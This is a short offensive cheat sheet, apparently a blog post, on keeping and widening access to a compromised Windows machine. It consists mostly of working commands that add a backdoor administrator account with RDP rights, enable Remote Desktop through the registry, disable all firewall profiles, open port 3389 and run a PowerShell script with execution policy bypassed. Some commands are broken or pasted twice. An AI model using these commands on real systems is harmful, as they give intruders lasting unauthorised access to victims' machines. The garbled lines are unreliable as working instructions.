Privilege Escalalation – Windows

After succesfully obtaining a shell on a Windows machine there are multiple ways through which an attacker can elevate their access and / or maintain a permanent foothold on the victim machine.

Windows Command prompt

Create user “badboy” add them to the local administrators and RDP users group. (requires Administrator level permissions)

net user badboy s3cr3t /add
net localgroup administrators badboy /add
net localgroup "Remote Desktop Users" badboy /add

Enable RDP via registry

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f

reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /

Set Terminal services to start automatically and start them:

sc config TermService start= auto
net start Termservice

METERPRETER

Meterpreter simplifies the task and allows for direct console input, without the need to break into a local shell.

reg enumkey -k HKLM\\system\\currentControlSet\\Control\\"Terminal Server"
reg createkey -k HKLM\\system\\currentControlSet\\Control\\"Terminal Server"\\"AllowTSConnections"

reg setval -k HKLM\\system\\currentControlSet\\Control\\"Terminal Server"\\"AllowTSConnections" -v 0x1 -d REG_DWORD

NetSh Advfirewall set allprofiles state off

netsh firewall add portopening TCP 3389 "Remote Desktop"

POWERSHELL

Powershell can be leveraged in order to produce a local malicious script that that would open the remote desktop port 3389 thus exposing the host machine to the attacker who should at this point have already created a legitimate system account.

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1